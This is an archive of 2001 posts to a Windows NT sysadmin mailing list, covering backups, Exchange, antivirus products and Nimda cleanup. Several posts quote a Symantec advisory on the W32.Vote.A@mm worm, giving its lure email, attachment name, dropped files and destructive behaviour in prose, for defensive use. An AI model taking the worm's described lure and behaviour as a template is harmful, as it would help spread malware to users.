2001-09-26 Thread RZorz
Title: RE: Win2k Cluster and Mac Shares





http://www.thursby.com/products/dave.html


-Original Message-
From: Matt Moore [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:36 AM
To: NT System Admin Issues
Subject: Re: Win2k Cluster and Mac Shares



can't remember the mfg. but there is a software named dave that allows
macs to browse nt domains like a pc, sort of. it's worked good for me. no
special mac crap on the network. just on the local mac.
Matt Moore
MCSE, MCP+I, NCSS, HP
- Original Message -
From: Joseph [EMAIL PROTECTED]
Newsgroups: ntsysadmin
To: NT System Admin Issues [EMAIL PROTECTED]
Sent: Wednesday, September 26, 2001 7:49 AM
Subject: Win2k Cluster and Mac Shares



 Any one know if mac shares will work within the cluster? When you create
 them at the share management level you have the option for the macintosh
 name, but when you add a file share resource to the cluster you do not get
 this.

 Haven't tested it yet. Was hoping to get some feedback first.

 Thanks



 Want to unsub? Do that here:
 http://www.w2knews.com/rd/rd.cfm?id=unsub
 Need a good FAQ? Try this one first:
 http://www.ultratech-llc.com/KB/




Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Backup Slow

2001-09-26 Thread RZorz
Title: Backup Slow



Read 
the logs and compare it to an old log. 

  -Original Message-From: William Smith 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 8:26 
  AMTo: NT System Admin IssuesSubject: RE: Backup 
  Slow
  Check under the job-- Advanced 
  tab
  
  Make 
  sure "Verify after backup completes" isn't checked. That would definitely 
  double the time.
  
  W
  -Original Message-From: Dominick Romano 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 
  11:32 AMTo: NT System Admin IssuesSubject: Backup 
  Slow
  Hello, we backup our servers with a Dell DLT 7000 7 
  Slot Tape Drive, using Veritas Backup Exec. Ver. 8. For some strange reason it 
  is taking double the amount of time to backup than it used to. Does anyone 
  have any ideas? Thanks.
  Dominick 
  Romano Junior NT 
  Administrator Kravet 
  Fabrics, Inc. Tel: 
  516-293-2000 Ext: 637 Fax: 
  516-293-2158 mailto:[EMAIL PROTECTED] 
  Want to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: satellite connection

2001-09-26 Thread RZorz



Here's 
some info, albeit dated: http://www.e-businessworld.com/english/crd_satellite_454142.html 
I thought Verizon had something too. 

  -Original Message-From: Joe L. Casale 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 11:20 
  AMTo: NT System Admin IssuesSubject: RE: satellite 
  connection
  
  msn has one, but they 
  make you buy it through radio shack, and right now, only w/ a new 
  Compaq.
  Jlc
  
  Ps. There is a service in NYC as my friend has one, he states 
  it gives about 6mb down! But only 33.6 kb up.
  
  -Original 
  Message-From: Matt Moore 
  [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 11:41 
  AMTo: NT System Admin 
  IssuesSubject: satellite 
  connection
  
  
  anyone have any exp with satellite 
  internet conn. I keep hearing MS has a service but haven't been able to 
  find any info.
  
  Matt MooreMCSE, MCP+I, NCSS, 
  HP
  Want to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one 
  first:http://www.ultratech-llc.com/KB/Want 
  to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a 
  good FAQ? Try this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: satellite connection

2001-09-26 Thread RZorz



Oops. 
Not Verizon, I was thinking of Sprint. 

  -Original Message-From: Ray Zorz Sent: 
  Wednesday, September 26, 2001 11:36 AMTo: NT System Admin 
  IssuesSubject: RE: satellite connection
  Here's some info, albeit dated: http://www.e-businessworld.com/english/crd_satellite_454142.html 
  I thought Verizon had something too. 
  
-Original Message-From: Joe L. Casale 
[mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 
11:20 AMTo: NT System Admin IssuesSubject: RE: 
satellite connection

msn has one, but they 
make you buy it through radio shack, and right now, only w/ a new 
Compaq.
Jlc

Ps. There is a service in NYC as my friend has one, he states 
it gives about 6mb down! But only 33.6 kb up.

-Original 
Message-From: Matt 
Moore [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 
11:41 AMTo: NT System 
Admin IssuesSubject: 
satellite connection


anyone have any exp with 
satellite internet conn. I keep hearing MS has a service but haven't 
been able to find any info.

Matt MooreMCSE, MCP+I, NCSS, 
HP
Want to unsub? Do that 
here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
this one 
first:http://www.ultratech-llc.com/KB/Want 
to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed 
a good FAQ? Try this one 
  first:http://www.ultratech-llc.com/KB/Want to unsub? Do 
  that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? 
  Try this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Create a Registry File

2001-09-26 Thread RZorz
Title: RE: Create a Registry File





http://www.win2000mag.com/Articles/Index.cfm?ArticleID=20047 may help


-Original Message-
From: Khurram Chaudhary [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 2:07 PM
To: NT System Admin Issues
Subject: Create a Registry File



Does anyone know how to create a registry file that will modify certain
keys and values?


Khurram Chaudhary
Astley-Gilbert Reproductions
[EMAIL PROTECTED]


Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin_mode=0=english



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Backup Slow

2001-09-26 Thread RZorz
Title: Backup Slow



I do, 
but I have time, and I'm not 24/7. 

  -Original Message-From: Keith Johnson 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 
  12:06 PMTo: NT System Admin IssuesSubject: RE: Backup 
  Slow
  Should we not verify???
  
-Original Message-From: 
[EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 
26, 2001 12:04 PMTo: NT System Admin IssuesSubject: 
RE: Backup Slow
Read the logs and compare it to an old log. 


  -Original Message-From: William Smith 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 
  8:26 AMTo: NT System Admin IssuesSubject: RE: Backup 
  Slow
  Check under the job-- Advanced 
  tab
  
  Make sure "Verify after backup completes" isn't 
  checked. That would definitely double the time.
  
  W
  -Original Message-From: Dominick Romano 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 
  2001 11:32 AMTo: NT System Admin IssuesSubject: 
  Backup Slow
  Hello, we backup our servers with a Dell DLT 
  7000 7 Slot Tape Drive, using Veritas Backup Exec. Ver. 8. For some 
  strange reason it is taking double the amount of time to backup than it 
  used to. Does anyone have any ideas? Thanks.
  Dominick 
  Romano Junior NT 
  Administrator Kravet 
  Fabrics, Inc. Tel: 516-293-2000 Ext: 637 Fax: 516-293-2158 mailto:[EMAIL PROTECTED] 
  Want to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do 
  that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good 
  FAQ? Try this one 
first:http://www.ultratech-llc.com/KB/Want to unsub? Do 
that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? 
Try this one first:http://www.ultratech-llc.com/KB/Want 
  to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a 
  good FAQ? Try this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Exchange Store.exe using 95% of CPU

2001-09-25 Thread RZorz
Title: Exchange Store.exe using 95% of CPU



A - 
Try the Sunbelt Exchange list. 
B - 
What SP of exchange?
C - 
Are you runningexchange maintenance nightly? Try turning it off 
tonite.

  -Original Message-From: Trixie Favato 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 
  25, 2001 6:54 AMTo: NT System Admin IssuesSubject: 
  Exchange Store.exe using 95% of CPU
  Has anyone experienced high CPU utilization from 
  the Store.exe when using Exchange 5.5. I've installed the recommended hotfix 
  that Microsoft put out, ran the optimizer again, re-installed SP6a, but 
  nothing seems to help it. Every morning, I am having to reboot the server 
  because the IS stops responding. If anyone has dealt with this before, please 
  share your resolution. 
  Thanks, 
  Trixie Favato Sr. Systems Administrator The Woodbridge Group - Information 
  Technology 4240 Sherwoodtowne 
  Blvd. Mississauga, Ontario 
  Tel. 905.896.3882 Fax. 905-848-1794 Want to unsub? 
  Do that 
  here:http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english





RE: Another F(*^ virus! (OT)

2001-09-25 Thread RZorz
Title: RE: Another F(*^ virus! (OT)





I haven't worked with any of the other packages, so I can't compare. It seems to do ok, although they don't have any ALERT system, and always seem to be the last to get a definition out. I still don't know if they have the Vote virus covered.

They automatically create a logon script to push the defs to the desktop, so as long as you make sure the server gets updated before everyone logs on it works fine. Our work hours make this a non-issue. Remote users have a problem with the speed. 

I do know that I gave up on active desktop scanning. It slowed my workstations down too much. I've been lucky that my folks get a lot of e-mail, but aren't big on downloading files. So I'm scanning Exchange and Outlook. Personally, I think way too many of the virii are being caught at the desktop rather than the Exchange server. They also have no filtering/blocking.

As soon as I can free up some money I'll most likely dump the Panda for Exchange and get Sybari.



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 6:21 AM
To: NT System Admin Issues
Subject: RE: Another F(*^ virus! (OT)




A little off the topic here, but how do you find Panda? We use Norton AV
for desktop and server protection, but have Panda for Lotus Notes
protection (I think it's a good idea to have a double layer sometimes).
Panda was suggested by our Notes Admin guy, and it has not worked correctly
since! Currently it is only running on one of our 4 Notes servers, and I
don't think it is doing too well there! I'm about ready to dump it, and
have put Norton on the other Notes servers to make sure they are covered.
Anyone else out there use Panda, and would actually recommend it?


G.



 
 RZorz@ScottsdaleC 
 hamber.com To: NT System Admin Issues 
 [EMAIL PROTECTED] 
 25/09/2001 13:51 cc: 
 Please respond to Subject: RE: Another F(*^ virus! 
 NT System Admin 
 Issues 
 
 





Actually one of my users sent that to me. I use Panda, which of course once
again seems to be the last to know.
 -Original Message-
 From: Danny Iaconetti [mailto:[EMAIL PROTECTED]]
 Sent: Monday, September 24, 2001 4:03 PM
 To: NT System Admin Issues
 Subject: RE: Another F(*^ virus!


 According to SARC, updating your definitions will detect this worm.
 Although, the latest update I get is dated Sep. 20. What's the scoop?
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED]]
 Sent: Monday, September 24, 2001 4:37 PM
 To: NT System Admin Issues
 Subject: Another F(*^ virus!





 Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
 Name of attachment: WTC.exe
 Size of attachment: 55808 Bytes



 Symantec Security Response
 http://securityresponse.symantec.com


 W32.Vote.A@mm
 Discovered on: September 24, 2001
 Last Updated on: September 24, 2001 at 09:56:27 AM PDT



 W32.Vote.A@mm is a mass-mailing worm that is written in Visual
 Basic. When executed, it will email itself out to all email
 addresses in the Microsoft Outlook address book. The worm will
 insert two .vbs files on the system, and it will also attempt to
 delete files from several antivirus products.



 Type: Worm



 Infection Length: 55,808 Bytes



 Virus Definitions: September 24, 2001



 Threat Assessment:




 Wild:
 Low Damage:
 High Distribution:
 High




 Wild:



 Number of infections: 0 - 49
 Number of sites: 3 - 9
 Geographical distribution: Medium
 Threat containment: Moderate
 Removal: Moderate
 Damage:



 Payload:
 Large scale e-mailing: Emails everyone in the Microsoft Outlook
 addressbook
 Deletes files: After reboot, the worm attempts to delete all
 files in the Windows folder
 Modifies files: All files with the extension htm or html will
 be overwritten.
 Compromises security settings: If the Backdoor.Trojan was
 successfully downloaded and installed, anyone could gain full
 access to the computer.



 Distribution:



 Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
 Name of attachment: WTC.exe
 Size of attachment: 55808 Bytes



 Technical description:



 W32.Vote.A@mm is a mass-mailing worm written in the Visual Basic
 language. It requires the file Msvbvm50.dll to execute.



 When executed, the worm will attempt to email itself to all
 contacts in the Microsoft Outlook address book. The email will
 appear as follows.



 Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM!



 Message:
 Hi
 iS iT A waR Against AmeriCa Or IsLaM !?
 Let's Vote To Live in Peace!



 Attachment: WTC.EXE



 Next, the worm will insert two .vbs files on the system:






 \Windows folder\ZaCker.vbs
 \Windows\System folder\MixDaLaL.vbs



 In addition, the worm will attempt to download and execute a
 file. This file is detected as Backdoor.Trojan by Norton
 Antivirus.



 Finally, the worm will attempt to delete all files from several
 folders. These folders appear to be the default installation
 folders for several antivirus products. For Norton AntiVirus,
 this worm

RE: Another F(*^ virus! (OT)

2001-09-25 Thread RZorz
Title: RE: Another F(*&^ virus! (OT)



Again, 
not a problem here. They all logout, and they all shutdown. If they 
don't for some reason, it shows up on the Panda Administrator screen, and I log 
them off myself. Hasn't been that big a problem here, but I've only got 50 
users. 

  -Original Message-From: Randal, Phil 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 25, 
  2001 7:45 AMTo: NT System Admin IssuesSubject: RE: 
  Another F(*^ virus! (OT)
  Sorry to be pedantic, but a login script is a pull, not a push, and if 
  your users habitually
  don't log out the login script ain't going to get run in a 
  hurry.
  
  Phil
  -Phil 
  RandalNetwork EngineerHerefordshire CouncilHereford, UK 

  
-Original Message-From: 
[EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED]]Sent: 25 September 2001 
15:01To: NT System Admin IssuesSubject: RE: Another 
F(*^ virus! (OT)
I haven't worked with any of the other packages, so I can't 
compare. It seems to do ok, although they don't have any "ALERT" 
system, and always seem to be the last to get a definition out. I still 
don't know if they have the Vote virus covered.
They automatically create a logon script to push the defs to 
the desktop, so as long as you make sure the server gets updated before 
everyone logs on it works fine. Our work hours make this a 
non-issue. Remote users have a problem with the speed. 
I do know that I gave up on active desktop scanning. 
It slowed my workstations down too much. I've been lucky that my folks 
get a lot of e-mail, but aren't big on downloading files. So I'm 
scanning Exchange and Outlook. Personally, I think way too many of the 
virii are being caught at the desktop rather than the Exchange server. 
They also have no filtering/blocking.
As soon as I can free up some money I'll most likely dump 
the Panda for Exchange and get Sybari. Want to unsub? 
  Do that 
  here:http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english





RE: Get Me Off the List, Please

2001-09-25 Thread RZorz
Title: RE: Get Me Off the List, Please





tough


-Original Message-
From: Murray Freeman [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 8:56 AM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please



You're correct sir,...but there is much too much noise on this list
nonetheless. I can't tell you how many postings I deleted about the WTC
disaster that had absolutely nothing to do with NTSYSADMIN. It can be very
frustrating but there is good info to be gleaned from this list. I've
contributed and I've been helped, but there's still too much noise.


Murray


-Original Message-
From: Dewar Charles R [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 10:46 AM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please



Name one.


-Original Message-
From: Andrew Blevins [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 9:52 AM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please



Looks like those of us who want off the list will have to set up an
auto-delete rule. This list is so full of noise, its not worth it. There are
much more professional, and useful, lists out there.






-Original Message-
From: Darril Gibson [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 5:28 PM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please



Me too. It was advertised as a no noise list. Not so. In just a couple of
hours, I have over 100 emails. I tried to get off, but the scripts on the
web page don't allow it.


Darril R. Gibson ([EMAIL PROTECTED])
Director of Continuing Education
MCT, MCSE, MCDBA, MCSD
America's Computer Training Source
340-, Cell 328-9299



-Original Message-
From: Lucia, Steve [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 5:23 PM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please



Just for your info the script is not working!!!



I too would like off this list 


Steve J. Lucia ([EMAIL PROTECTED])
Sr. Network Specialist
Client Server Group FFIOC
707-436-2840 co# 227-2840
pager 707-427-9176



-Original Message-
From: Don Ely [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 12:32 PM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please



Get yourself off the list. The link is at the bottom of the email.


-Original Message-
From: Maas [mailto:[EMAIL PROTECTED]] 
Sent: Monday, September 24, 2001 12:18 PM
To: NT System Admin Issues
Cc: [EMAIL PROTECTED]
Subject: Get Me Off the List, Please



[EMAIL PROTECTED]


please remove the address above from the list server


thank you...in over my head here 


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin_mod
e=0lang=english


Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin_mod
e=0lang=english


Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin_mode=0=english



Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english





RE: Another F(*^ virus! (OT)

2001-09-25 Thread RZorz
Title: RE: Another F(*^ virus! (OT)





I finally got it to autoupdate for Exchange. But as I said earlier, I'm still not sure if they have Vote in their defs, their website doesn't get updated quick enough and they don't send alerts. 

-Original Message-
From: Hasan Dervish [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 9:19 AM
To: NT System Admin Issues
Subject: Re: Another F(*^ virus! (OT)



I use panda on BackOffice and BackOffice SBS
the only problem I have seen its inability to fully autoupdate in sbs, and
autoupdate exchange server in BackOffice.
- Original Message -
From: Miranda, Fausto [EMAIL PROTECTED]
To: NT System Admin Issues [EMAIL PROTECTED]
Sent: Tuesday, September 25, 2001 2:57 PM
Subject: RE: Another F(*^ virus! (OT)



 dump it, I have never seen it work correctly.

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 25, 2001 9:21 AM
 To: NT System Admin Issues
 Subject: RE: Another F(*^ virus! (OT)



 A little off the topic here, but how do you find Panda? We use Norton AV
 for desktop and server protection, but have Panda for Lotus Notes
 protection (I think it's a good idea to have a double layer sometimes).
 Panda was suggested by our Notes Admin guy, and it has not worked
correctly
 since! Currently it is only running on one of our 4 Notes servers, and I
 don't think it is doing too well there! I'm about ready to dump it, and
 have put Norton on the other Notes servers to make sure they are covered.
 Anyone else out there use Panda, and would actually recommend it?

 G.




 RZorz@ScottsdaleC

 hamber.com To: NT System Admin
Issues


 [EMAIL PROTECTED]
 25/09/2001 13:51 cc:

 Please respond to Subject: RE: Another F(*^
 virus!
 NT System Admin

 Issues









 Actually one of my users sent that to me. I use Panda, which of course
once
 again seems to be the last to know.
 -Original Message-
 From: Danny Iaconetti [mailto:[EMAIL PROTECTED]]
 Sent: Monday, September 24, 2001 4:03 PM
 To: NT System Admin Issues
 Subject: RE: Another F(*^ virus!

 According to SARC, updating your definitions will detect this worm.
 Although, the latest update I get is dated Sep. 20. What's the scoop?
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED]]
 Sent: Monday, September 24, 2001 4:37 PM
 To: NT System Admin Issues
 Subject: Another F(*^ virus!




 Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
 Name of attachment: WTC.exe
 Size of attachment: 55808 Bytes


 Symantec Security Response
 http://securityresponse.symantec.com

 W32.Vote.A@mm
 Discovered on: September 24, 2001
 Last Updated on: September 24, 2001 at 09:56:27 AM PDT


 W32.Vote.A@mm is a mass-mailing worm that is written in Visual
 Basic. When executed, it will email itself out to all email
 addresses in the Microsoft Outlook address book. The worm will
 insert two .vbs files on the system, and it will also attempt to
 delete files from several antivirus products.


 Type: Worm


 Infection Length: 55,808 Bytes


 Virus Definitions: September 24, 2001


 Threat Assessment:



 Wild:
 Low Damage:
 High Distribution:
 High



 Wild:


 Number of infections: 0 - 49
 Number of sites: 3 - 9
 Geographical distribution: Medium
 Threat containment: Moderate
 Removal: Moderate
 Damage:


 Payload:
 Large scale e-mailing: Emails everyone in the Microsoft Outlook
 addressbook
 Deletes files: After reboot, the worm attempts to delete all
 files in the Windows folder
 Modifies files: All files with the extension htm or html
will
 be overwritten.
 Compromises security settings: If the Backdoor.Trojan was
 successfully downloaded and installed, anyone could gain full
 access to the computer.


 Distribution:


 Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
 Name of attachment: WTC.exe
 Size of attachment: 55808 Bytes


 Technical description:


 W32.Vote.A@mm is a mass-mailing worm written in the Visual Basic
 language. It requires the file Msvbvm50.dll to execute.


 When executed, the worm will attempt to email itself to all
 contacts in the Microsoft Outlook address book. The email will
 appear as follows.


 Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM!


 Message:
 Hi
 iS iT A waR Against AmeriCa Or IsLaM !?
 Let's Vote To Live in Peace!


 Attachment: WTC.EXE


 Next, the worm will insert two .vbs files on the system:





 \Windows folder\ZaCker.vbs
 \Windows\System folder\MixDaLaL.vbs


 In addition, the worm will attempt to download and execute a
 file. This file is detected as Backdoor.Trojan by Norton
 Antivirus.


 Finally, the worm will attempt to delete all files from several
 folders. These folders appear to be the default installation
 folders for several antivirus products. For Norton AntiVirus,
 this worm will only attempt to delete the files if Norton
 Antivirus is located in C:\Program Files\Norton AntiVirus.


 What the dropped files do


 MixDaLaL.vbs
 MixDaLaL.vbs is a Visual Basic

RE: OT: MS Project 98

2001-09-25 Thread RZorz



http://www.mvps.org/project/faqs.htm - 16. Project 
Viewer
Microsoft has not 
provided a viewer for Project. However, it is designed with the Web in mind, 
which allows anyone with an Internet Browser or email facilities to view 
details. For a picture, try clicking the copy picture button (little camera on 
the standard toolbar). There you have the option of creating a GIF file which 
can be used with the Save As... HTML format or directly attached to an 
email. Save As HTML...  give a file name and Save  
select an Export Map (or New Map)  Edit  Options tab check "Include 
image file in HTML page"  insert path and name of GIF image. 
[Project 2000 has Project 
Central which can display project information including graphical 
pages.]

  -Original Message-From: Sawatzke, Jeff 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 25, 
  2001 11:10 AMTo: NT System Admin IssuesSubject: RE: OT: 
  MS Project 98
  They 
  could publish them as HTML files.
  
-Original Message-From: Robert Toland 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 25, 2001 9:15 
AMTo: NT System Admin IssuesSubject: Re: OT: MS 
Project 98No, but if you come across one I'd be 
interested. 
"Jolley Lee @Consult" wrote: 
Dear All, 
  Sorry for the off topic question but I have hit a dead end. 
  Our users are receiving MS Project 98 files from clients but we use a 
  different package for project management. Does anybody know of a 
  viewer for MS project files? 
  Thankyou 
  Lee Jolley 
  ** 
  This email transmission is confidential and intended for the 
  addressee only. It may contain privileged and confidential 
  information. If you are not the person or organisation to whom it 
  is addressed, you must not copy, distribute, or take any action in 
  reliance upon it. If you have received this message in error, please 
  notify the [EMAIL PROTECTED] and return it. 
  Carillion PLC Registered in England No. 3782379 Registered Office: 
  Birch Street Wolverhampton WV1 4HY 
  ** 

  _ 
  This message has been checked for all known viruses by Star Internet 
  delivered through the MessageLabs Virus Scanning Service. For further 
  information visit http://www.star.net.uk/stats.asp 
  or alternatively call Star Internet for details on the Virus Scanning 
  Service. 
  Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=englishWant 
to unsub? Do that 
here:http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=englishWant 
  to unsub? Do that 
  here:http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english





RE: Nimda - Thought we were protected

2001-09-24 Thread RZorz
Title: RE: Nimda - Thought we were protected



You 
can't block attachments natively. You need 3rd party antivirus software. 


  -Original Message-From: Kelly Gosh 
  [mailto:[EMAIL PROTECTED]]Sent: Monday, September 24, 2001 
  11:07 AMTo: NT System Admin IssuesSubject: RE: Nimda - 
  Thought we were protected
  Where in Exchange 5.5 can you block certain attachments? 
  Ideally, I would like to block all *.exe and all *.vbs from most users. 
  I know how to block domains and email addresses, and I swear I've seen 
  attachment blocking, but for the life of me I can't find it anywhere 
  now!
  Any help would be appreciated. 
  Kelly Gosh Information Systems 
  Manager Brilliance Audio, Inc.  Phone: 616.846.5256 ext. 704 
  Fax: 616.846.0630  
  http://www.brillianceaudio.com 

  -Original Message- From: 
  [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
  Sent: Monday, September 24, 2001 12:47 PM To: NT System Admin Issues Subject: RE: Nimda - 
  Thought we were protected 
  SCAN ALL FILES (asp,js,htm,html,shtm,shtml,dll), 
  do NOT use program files only! 
  Replace riched20.dll and mcc.exe or you be infected again 
  after you reboot! (ofcourse replace them with clean copys!) 
  Kind regards, Pim Vessies 
  CSO Backoffice Philips Medical 
  Systems IM/CSO/BO Building QAII-441 
  Veenpluis 4 - 6, 5684 PC Best The 
  Netherlands 
  "Steve Kelsay" [EMAIL PROTECTED] on 09/24/2001 
  05:11:25 PM 
  Please respond to "NT System Admin Issues" 
  [EMAIL PROTECTED] 
  To: "NT System Admin Issues" 
  [EMAIL PROTECTED] cc: (bcc: Pim 
  Vessies/BST/MS/PHILIPS) Subject: RE: Nimda - 
  Thought we were protected Classification: 
  
  Yes, I had installed all the patches we discussed here on the 
  site. 
  Steve Kelsay Network Administration 
  Group South Carolina Department of Revenue 
  301 Gervais Street Columbia, SC 
  29201 
  (803) 898-5522 
   [EMAIL PROTECTED] 09/24/01 10:59AM 
   Did you have the IE patch applied? 
  If the browsed to a infected site they can get the 
  virus that way as well. Robert Muncy Sherman Financial Group 
  -Original Message- From: Steve 
  Kelsay [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 10:35 AM To: 
  NT System Admin Issues Subject: Nimda - Thought we 
  were protected 
  First alert, Maybe nothing. 
  We just had our developer machines, running NT2000 Server hit 
  with Nimda. 
  The strange thing is, we have Nimda protection in our email 
  scanner, and all the security fixes MS said should be 
  applied. SP2 is installed. 
  The machines boot up, a log in screen displays, and they 
  login. The Novell login script begins to run as normal 
  ( we run mixed network, NT and Novell), then the login 
  script box clears as normal, a blue screen appears as normal, and nothing further happens. 
  Could this be a new strain? 
  Steve Kelsay Network Administration 
  Group South Carolina Department of Revenue 
  301 Gervais Street Columbia, SC 
  29201 
  (803) 898-5522 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





Another F(*^ virus!

2001-09-24 Thread RZorz
Title: Another F(*^ virus!  






Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! 
Name of attachment: WTC.exe 
Size of attachment: 55808 Bytes 


Symantec Security Response
http://securityresponse.symantec.com 

W32.Vote.A@mm
Discovered on: September 24, 2001 
Last Updated on: September 24, 2001 at 09:56:27 AM PDT 


W32.Vote.A@mm is a mass-mailing worm that is written in Visual Basic. When executed, it will email itself out to all email addresses in the Microsoft Outlook address book. The worm will insert two .vbs files on the system, and it will also attempt to delete files from several antivirus products. 

Type: Worm 


Infection Length: 55,808 Bytes 


Virus Definitions: September 24, 2001 


Threat Assessment: 


 
Wild: 
Low Damage: 
High Distribution: 
High 



Wild: 


Number of infections: 0 - 49 
Number of sites: 3 - 9 
Geographical distribution: Medium 
Threat containment: Moderate 
Removal: Moderate 
Damage: 


Payload: 
Large scale e-mailing: Emails everyone in the Microsoft Outlook addressbook 
Deletes files: After reboot, the worm attempts to delete all files in the Windows folder 
Modifies files: All files with the extension htm or html will be overwritten. 
